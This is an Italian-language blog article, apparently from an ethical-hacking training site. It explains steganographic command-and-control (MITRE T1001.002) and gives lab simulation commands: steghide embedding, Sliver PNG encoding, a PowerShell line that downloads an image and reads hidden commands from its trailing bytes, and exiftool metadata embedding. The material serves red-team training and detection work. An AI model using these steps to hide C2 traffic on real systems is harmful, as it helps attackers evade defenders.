Steganografia nei Canali C2: Data Obfuscation – Steganography (T1001.002)

La steganografia applicata al Command and Control rappresenta una delle tecniche di offuscamento più insidiose nel panorama delle minacce avanzate. Anziché cifrare il traffico C2 — operazione che genera comunque pattern rilevabili — l'avversario nasconde comandi e dati all'interno di file apparentemente innocui: immagini JPEG, PNG, bitmap, documenti PDF o persino blob XML. Il canale di comunicazione diventa invisibile perché il contenitore (l'immagine, il documento) risulta perfettamente valido e apribile da qualunque visualizzatore.

Questa tecnica si colloca nella fase di Command and Control (TA0011), la fase della kill chain in cui l'attaccante ha già stabilito un punto d'appoggio nella rete compromessa e deve mantenere un dialogo stabile con i propri impianti. L'obiettivo è duplice: impartire comandi e ricevere output senza generare anomalie di rete visibili ai sistemi di difesa.

I numeri confermano la popolarità della tecnica: 11 software noti la implementano, 1 gruppo APT documentato (Axiom) la utilizza stabilmente e almeno 1 campagna di rilievo — Operation Ghost — ne ha fatto uso sistematico. Sul piano difensivo, esiste 1 mitigazione diretta basata su Network Intrusion Prevention, ma la vera sfida è nella detection comportamentale. Il payload steganografico non altera l'aspetto visivo del file contenitore, e le firme tradizionali basate su signature risultano largamente insufficienti: servono correlazioni tra creazione di file multimediali, entropia dei payload in uscita e pattern di beaconing.


La simulazione della steganografia C2 in laboratorio richiede due fasi distinte: la preparazione del contenitore steganografico e l'implementazione di un canale di comunicazione che lo sfrutti. È fondamentale operare esclusivamente in ambienti autorizzati e isolati.

Preparazione del payload con Steghide — Steghide (open source) è il tool classico per embedding LSB in immagini JPEG e BMP. Su una macchina Kali Linux o qualsiasi distribuzione con il pacchetto installato:

steghide embed -cf cover.jpg -ef payload.txt -p password123

Questo comando incorpora il file payload.txt dentro cover.jpg utilizzando una passphrase. Per estrarre sul lato impianto:

steghide extract -sf cover.jpg -p password123

L'immagine risultante è visivamente identica all'originale, ma contiene dati arbitrari nei bit meno significativi. Per i formati PNG — utilizzati da malware come Zox, LunarMail e il framework Sliver — è preferibile usare zsteg (open source, Ruby gem) per l'analisi e OpenStego (open source) per l'embedding.

Simulazione con Sliver — Il framework Sliver (open source) di Bishop Fox supporta nativamente l'encoding di dati C2 in file PNG. Dopo aver generato un impianto e avviato il listener, il traffico C2 viene incapsulato in immagini. In un lab red team è sufficiente configurare un HTTPS listener e abilitare il profilo di encoding PNG nella configurazione del server.

Catena d'attacco manuale su Windows — Per replicare il comportamento di HAMMERTOSS o LunarWeb, che ricevono comandi appesi o nascosti in immagini JPG/GIF, si può simulare il flusso con PowerShell:

Invoke-WebRequest -Uri -OutFile temp.jpg $bytes = [System.IO.File]::ReadAllBytes("temp.jpg"); $cmd = [System.Text.Encoding]::UTF8.GetString($bytes[$bytes.Length-256..$bytes.Length-1])

Questa sequenza scarica un'immagine e legge gli ultimi 256 byte, dove un operatore red team può aver appeso comandi in chiaro o codificati in Base64. È una semplificazione, ma replica il pattern fondamentale di Duqu che appende dati a file JPG vuoti.

Su Linux, per simulare il comportamento di RDAT con immagini BMP via email, si può usare ImageMagick (open source) per creare immagini BMP con dati embedded nei metadati EXIF tramite ExifTool (open source):

exiftool -Comment="$(base64 commands.txt)" cover.bmp

Il risultato è un'immagine BMP con il payload nei metadati, ispezionabile dal lato ricevente con exiftool -Comment cover.bmp | base64 -d.


Vuoi diventare un Ethical Hacker ma non sai da dove iniziare?

Scarica la guida gratuita e segui il percorso corretto fin dal primo passo